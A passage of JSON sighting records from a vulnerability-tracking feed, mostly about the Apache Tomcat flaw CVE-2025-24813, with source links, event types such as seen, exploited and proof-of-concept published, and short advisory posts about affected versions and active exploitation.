"2025-03-31T09:09:38.167623Z"}, {"uuid": "dc6ca7e3-a3e4-4757-be89-442a4096cf82", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2025-24813", "type": "seen", "source": "https://bsky.app/profile/omo.bsky.social/post/3lk2g3iyf622b", "content": "", "creation_timestamp": "2025-03-10T20:42:35.050215Z"}, {"uuid": "43410890-5b0f-4f23-b959-4915d6732602", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2025-24813", "type": "seen", "source": "https://bsky.app/profile/getpokemon7.bsky.social/post/3lkisb7sias2e", "content": "", "creation_timestamp": "2025-03-16T13:57:50.582286Z"}, {"uuid": "e8906ff4-e7a0-4ff3-92b0-d07011df5374", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2025-24813", "type": "seen", "source": "https://bsky.app/profile/nihonmatsu.bsky.social/post/3lk72mm2bos2n", "content": "", "creation_timestamp": "2025-03-12T17:00:41.337128Z"}, {"uuid": "c0fe54c4-c5fc-4a89-9167-88451092049f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2025-24813", "type": "seen", "source": "https://bsky.app/profile/rajsamani.bsky.social/post/3lksqe572yc26", "content": "", "creation_timestamp": "2025-03-20T12:50:16.505480Z"}, {"uuid": "79b0b6e7-d390-4ee0-b9af-6ed833cacfd0", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2025-24811", "type": "seen", "source": "https://infosec.exchange/users/cve/statuses/113984941120195910", "content": "", "creation_timestamp": "2025-02-11T11:09:33.705029Z"}, {"uuid": "56385df6-fdfc-4aeb-9dc8-07f4b5513540", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2025-24811", "type": "seen", "source": "https://bsky.app/profile/cve-notifications.bsky.social/post/3lhvju3nrrt2i", "content": "", "creation_timestamp": "2025-02-11T11:16:17.380872Z"}, {"uuid": "6fd9bca0-5a52-4aaa-ab91-108ef9359bfd", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2025-24812", "type": "seen", "source": "https://bsky.app/profile/cve-notifications.bsky.social/post/3lhvju5tawx2x", "content": "", "creation_timestamp": "2025-02-11T11:16:20.015422Z"}, {"uuid": "21f3ba31-835f-499b-b270-e8e7a6b6ef1d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2025-24812", "type": "seen", "source": "https://infosec.exchange/users/cve/statuses/113985000118532740", "content": "", "creation_timestamp": "2025-02-11T11:24:33.778790Z"}, {"uuid": "c9642ca4-e7c4-4db6-8602-214fdd15fc00", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2025-24812", "type": "seen", "source": "https://bsky.app/profile/cve.skyfleet.blue/post/3lhvu4pwzyb2t", "content": "", "creation_timestamp": "2025-02-11T14:20:09.073105Z"}, {"uuid": "1c2cad88-bb78-41ec-b2a9-45bc2c9cb382", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2025-24811", "type": "seen", "source": "https://bsky.app/profile/cve.skyfleet.blue/post/3lhvu4q7hex2v", "content": "", "creation_timestamp": "2025-02-11T14:20:10.353489Z"}, {"uuid": "6df9e942-6998-49f6-95dc-ecf799709c56", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2025-24813", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-03-18)", "content": "", "creation_timestamp": "2025-03-18T00:00:00.000000Z"}, {"uuid": "7da340c7-408a-4856-8d30-ec55bcc45a03", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2025-24813", "type": "seen", "source": "https://bsky.app/profile/calebpr.bsky.social/post/3lkrkzns6jj2p", "content": "", "creation_timestamp": "2025-03-20T01:42:13.824275Z"}, {"uuid": "46380a99-b7e5-4b60-975d-cf18697f78a9", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2025-24813", "type": "seen", "source": "https://bsky.app/profile/opsmatters.bsky.social/post/3lkrldyr7hn2d", "content": "", "creation_timestamp": "2025-03-20T01:48:01.011605Z"}, {"uuid": "792a3e9a-1bb9-4879-bee2-872ca0aefefa", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2025-24813", "type": "seen", "source": "https://bsky.app/profile/buherator.bsky.social/post/3lkd3375fuy2c", "content": "", "creation_timestamp": "2025-03-14T07:19:29.735597Z"}, {"uuid": "f70ef15c-b9d5-4e9b-af8a-4ae2a855eb77", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "cve-2025-24813", "type": "seen", "source": "https://cyberplace.social/users/GossiTheDog/statuses/114188579059937819", "content": "", "creation_timestamp": "2025-03-19T10:17:34.471974Z"}, {"uuid": "343a5343-7a18-45ec-a2a7-19fb951cbada", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2025-24813", "type": "seen", "source": "https://bsky.app/profile/GossiTheDog.cyberplace.social.ap.brid.gy/post/3lkpxebr3bjn2", "content": "", "creation_timestamp": "2025-03-19T10:17:46.945040Z"}, {"uuid": "7d45ff4a-8f91-4a64-9028-2eac38a1c204", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2025-24813", "type": "confirmed", "source": "https://github.com/projectdiscovery/nuclei-templates/tree/main/http/cves/2025/CVE-2025-24813.yaml", "content": "", "creation_timestamp": "2025-03-12T09:40:28.000000Z"}, {"uuid": "e4dabc01-9510-4788-b1ae-9c565c2a9d90", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2025-24813", "type": "seen", "source": "https://bsky.app/profile/securestep9.bsky.social/post/3lkn7offb5f26", "content": "", "creation_timestamp": "2025-03-18T08:08:26.465364Z"}, {"uuid": "12f2da7b-eb71-4d49-911c-5bd95ec57fff", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "cve-2025-24813", "type": "seen", "source": "https://bsky.app/profile/2rZiKKbOU3nTafniR2qMMSE0gwZ.activitypub.awakari.com.ap.brid.gy/post/3ll4zkfymito2", "content": "", "creation_timestamp": "2025-03-24T15:03:04.711899Z"}, {"uuid": "0f739a99-e78a-4b4a-9940-3ac03e7262e9", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2025-24813", "type": "seen", "source": "https://bsky.app/profile/mbissey.bsky.social/post/3lknctozbsd2b", "content": "", "creation_timestamp": "2025-03-18T09:05:05.369657Z"}, {"uuid": "9c4743dc-e099-4aa6-8007-462379d9f97b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "cve-2025-24813", "type": "seen", "source": "https://poliverso.org/objects/0477a01e-5d8a787e-0a46d2819f02fc70", "content": "", "creation_timestamp": "2025-03-18T09:19:45.952029Z"}, {"uuid": "f0cb48ca-e0a9-483b-9518-afce25487166", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2025-24813", "type": "seen", "source": "https://bsky.app/profile/r-netsec-bot.bsky.social/post/3lk655hq6662q", "content": "", "creation_timestamp": "2025-03-12T08:13:14.323618Z"}, {"uuid": "c65ce7f2-3406-42af-9ce0-f3373fbc4735", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2025-24813", "type": "seen", "source": "https://bsky.app/profile/pmloik.bsky.social/post/3lkomemcicw2k", "content": "", "creation_timestamp": "2025-03-18T21:28:16.056099Z"}, {"uuid": "e2e0a402-e4b0-4683-8344-1e3a0b3c0acd", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2025-24813", "type": "seen", "source": "https://bsky.app/profile/buzzleaktv.bsky.social/post/3ll53okymab2n", "content": "", "creation_timestamp": "2025-03-24T15:39:33.594064Z"}, {"uuid": "21ed1a53-1a67-4bbf-8195-038a6236aec1", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2025-24813", "type": "seen", "source": "https://bsky.app/profile/2rZiKKbOU3nTafniR2qMMSE0gwZ.activitypub.awakari.com.ap.brid.gy/post/3ll6musnsxh22", "content": "", "creation_timestamp": "2025-03-25T06:20:09.126302Z"}, {"uuid": "b1b98189-07db-4174-bf60-f2ea3eab842a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2025-24813", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-03-19)", "content": "", "creation_timestamp": "2025-03-19T00:00:00.000000Z"}, {"uuid": "4fbfbadc-30ea-4bf2-b115-4e0cc1f0bbe2", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2025-24813", "type": "seen", "source": "https://bsky.app/profile/bishopfox.bsky.social/post/3lkqjuefasc2r", "content": "", "creation_timestamp": "2025-03-19T15:48:44.750711Z"}, {"uuid": "51601617-c24c-4402-b6a2-288e85a23102", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2025-24813", "type": "seen", "source": "https://bsky.app/profile/hackingne.ws/post/3lkl4prgoyf2z", "content": "", "creation_timestamp": "2025-03-17T12:10:11.739319Z"}, {"uuid": "49c37ec6-24c0-409b-a799-8bf07c84f0b9", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "cve-2025-24813", "type": "seen", "source": "https://infosec.exchange/users/greynoise/statuses/114196410544132850", "content": "", "creation_timestamp": "2025-03-20T19:29:01.902291Z"}, {"uuid": "d4987f16-4a1f-45f6-bf31-ca3bb99e239f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "cve-2025-24813", "type": "seen", "source": "https://bsky.app/profile/greynoise.infosec.exchange.ap.brid.gy/post/3lktgndrsium2", "content": "", "creation_timestamp": "2025-03-20T19:29:41.960247Z"}, {"uuid": "cfcb37a4-18b5-4119-ab34-5f1d3ec3aef2", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2025-24813", "type": "seen", "source": "https://bsky.app/profile/greynoise.io/post/3lktgrp3mjk2e", "content": "", "creation_timestamp": "2025-03-20T19:31:32.861011Z"}, {"uuid": "e8972f27-d906-493d-a11a-f6a27d09a996", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2025-24813", "type": "seen", "source": "https://bsky.app/profile/buherator.bsky.social/post/3lk2475qby42e", "content": "", "creation_timestamp": "2025-03-10T17:45:38.340029Z"}, {"uuid": "b1900d86-2b2f-463f-8e77-d6e37526206d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2025-24813", "type": "seen", "source": "https://infosec.exchange/users/cR0w/statuses/114139387486690862", "content": "", "creation_timestamp": "2025-03-10T17:47:18.059361Z"}, {"uuid": "c7490246-7f6a-4fba-8189-c8d42f334295", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2025-24813", "type": "seen", "source": "https://bsky.app/profile/aakl.bsky.social/post/3llrmisaosk2g", "content": "", "creation_timestamp": "2025-04-01T19:33:47.660234Z"}, {"uuid": "50984e6b-a938-471e-b8fa-423716cb1292", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2025-24813", "type": "seen", "source": "https://bsky.app/profile/getpokemon7.bsky.social/post/3llsgwopo522e", "content": "", "creation_timestamp": "2025-04-02T03:26:53.959803Z"}, {"uuid": "740c1094-e322-40d8-9714-936b794ab7ca", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "cve-2025-24813", "type": "seen", "source": "https://bsky.app/profile/cti-news.bsky.social/post/3llgy3cyxii2m", "content": "", "creation_timestamp": "2025-03-28T14:01:43.088666Z"}, {"uuid": "7764dcd6-d4f7-42a6-83d7-7c6e039caa3d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2025-24813", "type": "seen", "source": "https://t.me/CyberBulletin/2684", "content": "\u26a1CVE-2025-24813 Potential RCE and/or information disclosure.\n\nVersions Affected:\nApache Tomcat 11.0.0-M1 to 11.0.2\nApache Tomcat 10.1.0-M1 to 10.1.34\nApache Tomcat 9.0.0.M1 to 9.0.98\n\n#CyberBulletin", "creation_timestamp": "2025-03-19T09:59:59.000000Z"}, {"uuid": "65cd6763-b46b-4180-8eb5-1004e1a6fcd9", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2025-24813", "type": "exploited", "source": "https://t.me/CyberBulletin/2679", "content": "\u26a1A critical remote code execution (RCE) vulnerability in Apache Tomcat tracked as CVE-2025-24813 is actively exploited in the wild, enabling attackers to take over servers with a simple PUT request. \n\n#CyberBulletin", "creation_timestamp": "2025-03-18T05:44:12.000000Z"}, {"uuid": "9d134317-2ed6-48e0-8c27-57eb249b6f03", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2025-24813", "type": "seen", "source": "https://t.me/CyberBulletin/2582", "content": "\u26a1CVE-2025-24813 in Apache Tomcat drops\u2014potential RCE, data leaks, or corruption via partial PUTs! Attackers could OWN your servers.\n\n#CyberBulletin", "creation_timestamp": "2025-03-11T14:18:32.000000Z"}, {"uuid": "88bbe0c7-bf00-4588-a3dc-0a4d7a8dcd8f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2025-24813", "type": "seen", "source": "https://t.me/CyberBulletin/2576", "content": "\u26a1CVE-2025-24813 Flaw in Apache Tomcat Exposes Servers to RCE, Data Leaks: Update Immediately.\n\n#CyberBulletin", "creation_timestamp": "2025-03-11T14:11:52.000000Z"}, {"uuid": "39b4d45c-9a95-4d69-8baf-7d9d2eb093ca", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2025-24813", "type": "seen", "source": "https://t.me/ViralCyber/11540", "content": "\ud83d\udd34 \u0622\u0633\u06cc\u0628 \u067e\u0630\u06cc\u0631\u06cc \u0627\u062c\u0631\u0627\u06cc \u06a9\u062f \u062f\u0631 Apache Tomcat\n\n\u0622\u0633\u06cc\u0628 \u067e\u0630\u06cc\u0631\u06cc \u0627\u0645\u0646\u06cc\u062a\u06cc \u0628\u0627 \u0634\u0646\u0627\u0633\u0647 \u06cc CVE-2025-24813 \u062f\u0631 Apache Tomcat \u0627\u0635\u0644\u0627\u062d \u0634\u062f\u0647 \u06a9\u0647 \u0627\u0645\u06a9\u0627\u0646 RCE\u060c \u0627\u0641\u0634\u0627\u06cc \u0627\u0637\u0644\u0627\u0639\u0627\u062a \u062d\u0633\u0627\u0633 \u0648 \u062f\u0633\u062a\u06a9\u0627\u0631\u06cc \u062f\u0627\u062f\u0647 \u0647\u0627 \u0631\u0648 \u0628\u0647 \u0645\u0647\u0627\u062c\u0645 \u0645\u06cc\u062f\u0647.\n\n#\u0622\u0633\u06cc\u0628_\u067e\u0630\u06cc\u0631\u06cc_\u0627\u0645\u0646\u06cc\u062a\u06cc \n#CVE #ApacheTomcat #RCE \n\n\ud83c\udd94 @onhex_ir\n\u27a1\ufe0f ALL Link", "creation_timestamp": "2025-03-13T08:27:31.000000Z"}, {"uuid": "7268e99e-2ecb-43e1-bd5c-22fda0631106", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2025-24813", "type": "published-proof-of-concept", "source": "Telegram/vUGMvstSYOoUDxx-O4QTLDAV49BnFrwaRby9_jbBdmSD8WM", "content": "", "creation_timestamp": "2025-03-22T22:00:06.000000Z"}, {"uuid": "77cce348-245f-4280-aaee-42de9c496469", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2025-24813", "type": "published-proof-of-concept", "source": "Telegram/SYmGj_MDj-F682IcXl4wrcSlV57ttmjlosZ04VZo999eeGs", "content": "", "creation_timestamp": "2025-04-07T05:00:06.000000Z"}, {"uuid": "ff423197-c6f7-46a0-ac5d-78617e5c8d0a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2025-24813", "type": "published-proof-of-concept", "source": "Telegram/2Mv-2iki26E7M91NoHSItb85uE7hmbSk_CGlhbCKtUOV7I0", "content": "", "creation_timestamp": "2025-04-05T17:00:10.000000Z"}, {"uuid": "856533b7-18e7-475e-af9d-3f8c51849520", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2025-24813", "type": "published-proof-of-concept", "source": "Telegram/025r9Ac4mA6AzmYH4V_5jxzygPRuLIkjd6NMrYR-gf6fiv4", "content": "", "creation_timestamp": "2025-04-18T17:00:10.000000Z"}, {"uuid": "12d7d3a5-94b9-43ac-8004-f513bdb8ed4d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2025-24813", "type": "published-proof-of-concept", "source": "Telegram/t4W2qGLDrPTh4ylfVSi32sIJvO37xNh95ZguxDMzeYbNCQs", "content": "", "creation_timestamp": "2025-03-13T16:00:07.000000Z"}, {"uuid": "d5bbd097-6c56-4670-950f-b8f61d32caa8", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2025-24813", "type": "published-proof-of-concept", "source": "Telegram/9LVGSk6wVw0IWhEGPHpvxSTJTnKNt02SSt_xE5fqoYcZYJA", "content": "", "creation_timestamp": "2025-03-14T20:00:08.000000Z"}, {"uuid": "fc3669f0-8e9c-467f-9bf4-2b66b40af8f5", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2025-24813", "type": "published-proof-of-concept", "source": "Telegram/02VwLT3-alMBHMrurAdso0o-X_elsf90vyEBHIsSiJpLnKI", "content": "", "creation_timestamp": "2025-03-14T08:00:09.000000Z"}, {"uuid": "e2543355-b7a4-4a4a-997b-1ba4db887e08", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2025-24813", "type": "published-proof-of-concept", "source": "Telegram/pg7kvtgf18i2NSpY74T8eUGfUmlZbISb88s-xMWif3Xt7vA", "content": "", "creation_timestamp": "2025-03-14T16:00:08.000000Z"}, {"uuid": "2113ec9b-b12c-48c5-b0a3-fff3182188c6", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2025-24813", "type": "seen", "source": "Telegram/Uq-nYUAbPQym8dtJVJFG1DEELRh97NOGT3ieRAr2exNNXBo", "content": "", "creation_timestamp": "2025-03-12T09:31:15.000000Z"}, {"uuid": "f5bb95bc-33ee-4155-8887-225cbcc8a18b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2025-2481", "type": "published-proof-of-concept", "source": "Telegram/s1Ug2Huruu4oSXmaY90A5V_pnyIa5y5rnMkwXKHm6FV28GI", "content": "", "creation_timestamp": "2025-03-17T16:26:43.000000Z"}, {"uuid": "17648552-830d-4054-8bd0-bcc9c5d05300", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2025-24813", "type": "published-proof-of-concept", "source": "Telegram/YkV8t1LCoFDP_LiinWajN0XdojCXwmEcwxesvfXvd8WmcUc", "content": "", "creation_timestamp": "2025-03-17T10:00:06.000000Z"}, {"uuid": "c29d07d2-6193-4c77-979b-cd9d1afaca76", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2025-24813", "type": "published-proof-of-concept", "source": "Telegram/RFELXp7UwD6Vp7JHUr5BYkSzkfOrvFk2TEPoPzivoxKdsYg", "content": "", "creation_timestamp": "2025-03-17T09:39:15.000000Z"}, {"uuid": "ae2aa30f-4228-45e2-b275-73597c569eb1", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2025-24813", "type": "published-proof-of-concept", "source": "Telegram/NEW4pcU90q5B_s6yFbFP2Kt8zY1ba7u3tPYDdw-smW-WS38", "content": "", "creation_timestamp": "2025-03-17T08:00:10.000000Z"}, {"uuid": "13b85924-73e3-4a8c-bb70-1b6b36d03616", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2025-24813", "type": "published-proof-of-concept", "source": "Telegram/ThXju2ZMT_612yASJRrFQJIKnYK5F6XY7q6en3PVZ2DGB64", "content": "", "creation_timestamp": "2025-03-21T04:00:08.000000Z"}, {"uuid": "c03c8053-7173-4942-b4a8-c8779053d11a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2025-24813", "type": "published-proof-of-concept", "source": "Telegram/wSGzmOjLrmEcQmMBXaHVXNxUHoaomU1r4hfeqWwSlXhrWUk", "content": "", "creation_timestamp": "2025-03-19T22:00:06.000000Z"}, {"uuid": "94bec1b1-8b4b-4fe3-891e-8132beb5572e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2025-24813", "type": "seen", "source": "Telegram/Dx7vZWH_LM_56yZN0c2ZxaqMC9NEHIV5QZXHh3bHlYxpHQ0", "content": "", "creation_timestamp": "2025-03-16T16:00:09.000000Z"}, {"uuid": "fe5d1ce4-3183-4f6f-9e07-99425089613c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2025-24813", "type": "published-proof-of-concept", "source": "https://t.me/proxy_bar/2541", "content": "CVE-2025-24813 Apache Tomcat RCE\n*", "creation_timestamp": "2025-03-13T17:32:51.000000Z"}, {"uuid": "3721b1e0-a8b6-4880-8ed2-020422af09fa", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2025-2481", "type": "published-proof-of-concept", "source": "Telegram/rboV92Ep3wKwhKjGMPVNlyCcbF-1ZcN1-Xzrgk2wbUZuurY", "content": "", "creation_timestamp": "2025-03-17T16:26:43.000000Z"}, {"uuid": "eac1871f-b8ed-4dd3-bdb8-5b9447239adf", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2025-24813", "type": "published-proof-of-concept", "source": "Telegram/Y0mc5TFNJrxhbvKjJ92dfl8Dj2YpEf0hf49nP_pBnkyKv20", "content": "", "creation_timestamp": "2025-03-17T13:23:45.000000Z"}, {"uuid": "2a9b8e2e-b406-4fb1-8a61-1a6465ce3e0f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2025-24813", "type": "exploited", "source": "https://t.me/jj_8tl/214", "content": "\ud83d\udea8 CVE-2025-24813 Alert: Critical Apache Tomcat RCE via partial PUT disclosed on Mar 10. GreyNoise detects 4 IPs exploiting it since Mar 17. Vulnerable systems risk arbitrary code execution. Check your exposure with my all-in-one query for internet-facing Tomcat instances.\n\n\u2728 Shared via Awham AutoFeed \u2728\nChannel: @jj_8tl", "creation_timestamp": "2025-04-11T12:09:21.000000Z"}, {"uuid": "cabe2d9a-8422-4fc8-9dc3-b1c274736b6a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2025-24813", "type": "exploited", "source": "https://t.me/thehackernews/6503", "content": "\ud83d\udea8 Apache Tomcat Under Attack.\n\nHackers are actively exploiting CVE-2025-24813 just 30 hours after disclosure.\n\n\ud83d\udd39 RCE &amp; Info Disclosure Risk\n\ud83d\udd39 No Authentication Needed\n\ud83d\udd39 Attackers Upload &amp; Execute Malicious Files\n\n\u26a0\ufe0f Delaying could mean backdoors, config tampering &amp; full compromise.\n\nRead: https://thehackernews.com/2025/03/apache-tomcat-vulnerability-comes-under.html\n\nDon\u2019t wait\u2014secure your systems NOW", "creation_timestamp": "2025-03-17T18:11:27.000000Z"}, {"uuid": "60a9f2b6-7e3d-4f36-976d-f0016f677c58", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2025-24813", "type": "seen", "source": "https://t.me/CyberSecurityTechnologies/11924", "content": "#exploit\n1. CVE-2025-27636, CVE-2025-29891:\nApache Camel RCE PoC/Detection\n\n2. CVE-2024-0760:\nDoS in ISC BIND DNS\n\n3. CVE-2025-24813:\nApache Tomcat RCE\n\n4. CVE-2015-0009:\nSMB Security Feature Bypass (SMB Signing)\n\n5. CVE-2024-0582, CVE-2024-35880:\nA Series of io_uring pbuf Vulnerabilities", "creation_timestamp": "2025-03-13T23:40:19.000000Z"}, {"uuid": "c0a0ac85-72f1-4507-919e-6d67495b23c6", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2025-24810", "type": "seen", "source": "https://bsky.app/profile/cve-notifications.bsky.social/post/3lgrp6pkiei2t", "content": "", "creation_timestamp": 